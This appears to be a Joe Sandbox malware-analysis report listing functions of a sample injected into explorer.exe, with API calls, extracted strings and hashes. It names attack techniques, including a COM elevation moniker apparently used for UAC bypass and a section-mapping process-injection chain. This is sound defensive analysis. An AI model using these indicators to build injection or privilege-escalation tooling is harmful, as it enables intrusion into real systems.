                                                                            • GetStdHandle.KERNEL32 ref: 00C0EA59
                                                                            • WriteFile.KERNEL32 ref: 00C0EAB6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                            • API String ID: 2183313154-4022980321
                                                                            • Opcode ID: a466164d332dd90d406ca9b58455ee3c3e4c71f87633efd298baad6cbfeeeaef
                                                                            • Instruction ID: e9329548194598a1b921e9e2302e60485edd811e7b3e486cf287bd9c7865158b
                                                                            • Opcode Fuzzy Hash: a466164d332dd90d406ca9b58455ee3c3e4c71f87633efd298baad6cbfeeeaef
                                                                            • Instruction Fuzzy Hash: DE51263630479082EB24DB36A821B9B7351FB8A790F844626EE6943BD5CF3CC64AD704
                                                                            Function 00BF11A4 Relevance: 15.0, APIs: 10, Instructions: 32nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$HandleSectionUnmapView$ProcessTerminate
                                                                            • String ID:
                                                                            • API String ID: 4250251239-0
                                                                            • Opcode ID: a53434f1cd64de1ac4a742b2910a49c27e28c7a9365db1277a78b5f9f20ddc51
                                                                            • Instruction ID: edc7f802c72358a5a0b12cc3c71e91b8ddb1074c763173fd38e75fc795826853
                                                                            • Opcode Fuzzy Hash: a53434f1cd64de1ac4a742b2910a49c27e28c7a9365db1277a78b5f9f20ddc51
                                                                            • Instruction Fuzzy Hash: 0F111735518A84C2EB60DF15F8747AEB361F7C8B91F505112DA8E43A28CF7CC489DB00
                                                                            Function 00C139FC Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno$_invalid_parameter_noinfo$_cftoe_l_getptd
                                                                            • String ID: gfffffff
                                                                            • API String ID: 1282097019-1523873471
                                                                            • Opcode ID: 70f64d29eda5dc2a4778368f7b480cadbb51046fac34f9dff00ff8b5627f9baf
                                                                            • Instruction ID: 5fff1ccd7d616b0f545b92ce33247ea132b929ce174ca7be1b547e6adad07224
                                                                            • Opcode Fuzzy Hash: 70f64d29eda5dc2a4778368f7b480cadbb51046fac34f9dff00ff8b5627f9baf
                                                                            • Instruction Fuzzy Hash: 1CA142637147C48BDB01CB2AD6953ED7BA5E7127A8F04C621CF6A0B795E638C695E300
                                                                            Function 00BE42E0 Relevance: 9.0, APIs: 6, Instructions: 47processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 1789362936-0
                                                                            • Opcode ID: fa37bcbe406a99695d2d22c13647398b81bb9ccce6540e4b2511495a71c7227e
                                                                            • Instruction ID: acd18a779d990f593e2608e6dc8a45fe88261338b174f157da655f563b70e048
                                                                            • Opcode Fuzzy Hash: fa37bcbe406a99695d2d22c13647398b81bb9ccce6540e4b2511495a71c7227e
                                                                            • Instruction Fuzzy Hash: 9821D032218A80C6EB60DB15F89475EB3E1F784765F505325A5AE866E8DF7CC5098B04
                                                                            Function 00BE43D0 Relevance: 9.0, APIs: 6, Instructions: 47processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 1789362936-0
                                                                            • Opcode ID: 14b3d4f8988eff83989854e1301446e4a54da2a7df46ba258aa51084a2a80777
                                                                            • Instruction ID: 24b33b4b41396de95ba68368deb7a334121a98236a14180604108f26ed61fe24
                                                                            • Opcode Fuzzy Hash: 14b3d4f8988eff83989854e1301446e4a54da2a7df46ba258aa51084a2a80777
                                                                            • Instruction Fuzzy Hash: DB21D032318A80C6EB60DB16F89475A63F1F784765F504325E5AE867E4DF3CC5098B00
                                                                            Function 00C11848 Relevance: 107.7, APIs: 86, Instructions: 180COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: free$ErrorFreeHeapLast_errno
                                                                            • String ID:
                                                                            • API String ID: 1012874770-0
                                                                            • Opcode ID: 4a89303ada8976f5ba6e723fc5dc129f4762e2132d56d8738a2842697157dd51
                                                                            • Instruction ID: a0f3d14657f1b413a454a0e812fb6b7ede41cee8c40f104460748707863d0ef0
                                                                            • Opcode Fuzzy Hash: 4a89303ada8976f5ba6e723fc5dc129f4762e2132d56d8738a2842697157dd51
                                                                            • Instruction Fuzzy Hash: AC81552229154885DF41FFB1C8F52BE2321FBE4F4CF044272AE4D4B5AACEA0C845D390
                                                                            Function 00BE11B0 Relevance: 66.7, APIs: 24, Strings: 14, Instructions: 176stringlibraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateEventW.KERNEL32 ref: 00BE11DF
                                                                            • GetWindowsDirectoryW.KERNEL32 ref: 00BE1218
                                                                            • CloseHandle.KERNEL32 ref: 00BE157B
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • GetCurrentDirectoryW.KERNEL32 ref: 00BE128D
                                                                            • LocalAlloc.KERNEL32 ref: 00BE12B1
                                                                            • GetModuleHandleW.KERNEL32 ref: 00BE12D5
                                                                            • GetProcAddress.KERNEL32 ref: 00BE12F2
                                                                            • GetProcAddress.KERNEL32 ref: 00BE1312
                                                                            • lstrcpyW.KERNEL32 ref: 00BE133C
                                                                            • lstrcpyW.KERNEL32 ref: 00BE135A
                                                                            • lstrcpyW.KERNEL32 ref: 00BE1379
                                                                            • lstrcpyW.KERNEL32 ref: 00BE1397
                                                                            • lstrcpyW.KERNEL32 ref: 00BE13B6
                                                                            • lstrcpyA.KERNEL32 ref: 00BE13D4
                                                                            • lstrcpyA.KERNEL32 ref: 00BE13F2
                                                                            • lstrcpyA.KERNEL32 ref: 00BE1410
                                                                            • lstrcpyA.KERNEL32 ref: 00BE142E
                                                                            • lstrcpyW.KERNEL32 ref: 00BE144A
                                                                            • lstrcpyW.KERNEL32 ref: 00BE1468
                                                                              • Part of subcall function 00BE7940: GetCurrentProcess.KERNEL32 ref: 00BE795D
                                                                              • Part of subcall function 00BE7940: CreateProcessW.KERNEL32 ref: 00BE7A16
                                                                              • Part of subcall function 00BE7940: NtCreateSection.NTDLL ref: 00BE7A71
                                                                              • Part of subcall function 00BE7940: GetCurrentProcess.KERNEL32 ref: 00BE7AA7
                                                                              • Part of subcall function 00BE7940: NtMapViewOfSection.NTDLL ref: 00BE7AFA
                                                                              • Part of subcall function 00BE7940: NtMapViewOfSection.NTDLL ref: 00BE7B8F
                                                                            • WaitForSingleObject.KERNEL32 ref: 00BE14FD
                                                                            • TerminateProcess.KERNEL32 ref: 00BE1533
                                                                            • CloseHandle.KERNEL32 ref: 00BE1541
                                                                            • CloseHandle.KERNEL32 ref: 00BE154F
                                                                            • LocalFree.KERNEL32 ref: 00BE1568
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcpy$HandleProcess$CloseCreateCurrentSection$AddressDirectoryLocalProcView$AllocEventFreeModuleObjectSingleTerminateWaitWindows_errno_invalid_parameter_noinfo
                                                                            • String ID: %s\explorer.exe$CoGetObject$CoInitialize$Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}$ExitProcess$GetProcAddress$IIDFromString$KERNEL32.DLL$KERNEL32.DLL$LoadLibraryW$OLE32.DLL${4042FD4A-C237-4861-80BD-1FA24BEF8CE4}${6EDD6D74-C007-4E75-B76A-E5740995E24C}${F6FB16F6-69D4-4502-9E85-2E5E52F61D5C}
                                                                            • API String ID: 3898657461-2375178247
                                                                            • Opcode ID: 5d559f52e9a663e13f135feb56ea1ec1332f638e0a30c25c3a649297af3b307e
                                                                            • Instruction ID: 789497714b42343f14cd19e5228c6b6f7593c6f474c10690d429889d65dd565c
                                                                            • Opcode Fuzzy Hash: 5d559f52e9a663e13f135feb56ea1ec1332f638e0a30c25c3a649297af3b307e
                                                                            • Instruction Fuzzy Hash: 70A12975209B8486FB60CF19E45479A73A2F7C9B90F904626DA8E43B68DF3DC15CCB00
                                                                            Function 00BF5180 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 344registryfilememoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • setsockopt.WS2_32 ref: 00BF5204
                                                                            • RegCreateKeyExW.ADVAPI32 ref: 00BF5351
                                                                            • LocalAlloc.KERNEL32 ref: 00BF5410
                                                                            • _LDint.LIBCPMTD ref: 00BF557C
                                                                            • _LDint.LIBCPMTD ref: 00BF55B1
                                                                            • CreateFileW.KERNEL32 ref: 00BF5614
                                                                            • WriteFile.KERNEL32 ref: 00BF565A
                                                                            • RegCloseKey.ADVAPI32 ref: 00BF5903
                                                                            • LocalFree.KERNEL32 ref: 00BF591C
                                                                            • LocalFree.KERNEL32 ref: 00BF5935
                                                                            • LocalFree.KERNEL32 ref: 00BF594E
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • shutdown.WS2_32 ref: 00BF5975
                                                                            • closesocket.WS2_32 ref: 00BF5980
                                                                              • Part of subcall function 00C04C90: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C04CCF
                                                                              • Part of subcall function 00C04740: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00C0477F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LocalTimer$Free$ChangeConcurrency::details::platform::__CreateDintFileQueue$AllocCloseWrite_errno_invalid_parameter_noinfoclosesocketsetsockoptshutdown
                                                                            • String ID: ?$SOFTWARE\%s${70F925A9-13A6-49C0-913B-C685A8E9B495}
                                                                            • API String ID: 2583228562-589786118
                                                                            • Opcode ID: 04720dedddbbfc74f2b7b11cc4c88cef06d10f380cd3efded139e3232de76a69
                                                                            • Instruction ID: 2e86983cfd5b44c7e997473b65498f1e5d107154d422c288a8866a1f1a07d21c
                                                                            • Opcode Fuzzy Hash: 04720dedddbbfc74f2b7b11cc4c88cef06d10f380cd3efded139e3232de76a69
                                                                            • Instruction Fuzzy Hash: 0012B736218FC4C6D7719B15E4947AAB3A5F388764F504226D7EE83B98DF78C589CB00
                                                                            Function 00C121CC Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 136libraryloaderCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                                                                            • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                            • API String ID: 2643518689-564504941
                                                                            • Opcode ID: d37108003cac474a8c701e83636fc616b018a3e7b56aac5cdfc92d5c433599e0
                                                                            • Instruction ID: c2281aa957e1387307872fcc874908aa0f3efd92b91ccd8a5db12893884f7f2e
                                                                            • Opcode Fuzzy Hash: d37108003cac474a8c701e83636fc616b018a3e7b56aac5cdfc92d5c433599e0
                                                                            • Instruction Fuzzy Hash: 33514D34306B4585FE19DB52B864BA923A4FB4AB90F8806259D2E47771EF3CC59AE300
                                                                            Function 00BF0330 Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 109sleepregistrymemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • {C2479B37-C2B3-42BB-AA73-3313D48DF29B}, xrefs: 00BF0432
                                                                            • %s\%s, xrefs: 00BF0446
                                                                            • {E83187BB-7111-445B-879E-34A213BF001C}, xrefs: 00BF0566
                                                                            • {16B194B1-19CC-4C52-92E2-1BFAC8473D8C}, xrefs: 00BF0343
                                                                            • {8931AB7A-A1AA-4E58-80EA-2B1247F36722}, xrefs: 00BF0392
                                                                            • Software\%s, xrefs: 00BF056D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseEventFileFreeHandleLocalOpen$AllocAttributesDeleteFolderKnownMutexObjectOperationPathSingleSleepTaskWaitlstrlenwnsprintf
                                                                            • String ID: %s\%s$Software\%s${16B194B1-19CC-4C52-92E2-1BFAC8473D8C}${8931AB7A-A1AA-4E58-80EA-2B1247F36722}${C2479B37-C2B3-42BB-AA73-3313D48DF29B}${E83187BB-7111-445B-879E-34A213BF001C}
                                                                            • API String ID: 896765885-521004812
                                                                            • Opcode ID: 2b88cd6d77688c10a737e252b3dd4611e94d1061b44b1b070ff6bb6cfe9abd3a
                                                                            • Instruction ID: c0e422346c3156bf7671d306fb96216d888c6a96555a250023b9bfc4855b89df
                                                                            • Opcode Fuzzy Hash: 2b88cd6d77688c10a737e252b3dd4611e94d1061b44b1b070ff6bb6cfe9abd3a
                                                                            • Instruction Fuzzy Hash: F851FA35218AC5C2E770EB15E8647AE73E5FBC8754F508225D6CA83AA8DF7CC549CB80
                                                                            Function 00BF33C0 Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 217memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$Path$AllocFolderKnownTask$DintDirectoryTempWindows_errno_invalid_parameter_noinfo
                                                                            • String ID: '%s%s'$'%s%s'$'%s%s'$'%s%s'$'%s%s'$'%s'
                                                                            • API String ID: 4190533178-4258658051
                                                                            • Opcode ID: 3e354cff4670192f7f0aa3ba0ac307336d0a7c352c9ceb26a1ae8157155194bc
                                                                            • Instruction ID: ae9054be6fa168061d5cfa77f82d61ffddaf8c767583e4c028376adacc1bb195
                                                                            • Opcode Fuzzy Hash: 3e354cff4670192f7f0aa3ba0ac307336d0a7c352c9ceb26a1ae8157155194bc
                                                                            • Instruction Fuzzy Hash: BAC1E872218AC5D6EB70DB14E8987AAB3A0F7C5B45F504226D68E47BB8DF3CC549CB04
                                                                            Function 00BEF850 Relevance: 33.3, APIs: 14, Strings: 5, Instructions: 95memoryprocessstringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00BEF510: SHGetKnownFolderPath.SHELL32 ref: 00BEF587
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF59A
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF5B5
                                                                              • Part of subcall function 00BEF510: LocalAlloc.KERNEL32 ref: 00BEF5DC
                                                                              • Part of subcall function 00BEF510: lstrlenW.KERNEL32 ref: 00BEF620
                                                                              • Part of subcall function 00BEF510: CoTaskMemFree.COMBASE ref: 00BEF635
                                                                            • LocalAlloc.KERNEL32 ref: 00BEF88C
                                                                            • LocalFree.KERNEL32 ref: 00BEFA3D
                                                                              • Part of subcall function 00C08378: _errno.LIBCMT ref: 00C083AF
                                                                              • Part of subcall function 00C08378: _invalid_parameter_noinfo.LIBCMT ref: 00C083BA
                                                                            • LocalAlloc.KERNEL32 ref: 00BEF8D4
                                                                            • GetModuleFileNameW.KERNEL32 ref: 00BEF8F8
                                                                            • lstrcmpiW.KERNEL32 ref: 00BEF910
                                                                            • LocalAlloc.KERNEL32 ref: 00BEF928
                                                                            • CreateProcessW.KERNEL32 ref: 00BEF9D9
                                                                            • LocalFree.KERNEL32 ref: 00BEF9E9
                                                                            • LocalFree.KERNEL32 ref: 00BEF9F4
                                                                            • LocalFree.KERNEL32 ref: 00BEF9FF
                                                                            • LocalFree.KERNEL32 ref: 00BEFA0A
                                                                            • LocalFree.KERNEL32 ref: 00BEFA1C
                                                                            • LocalFree.KERNEL32 ref: 00BEFA27
                                                                            • LocalFree.KERNEL32 ref: 00BEFA32
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
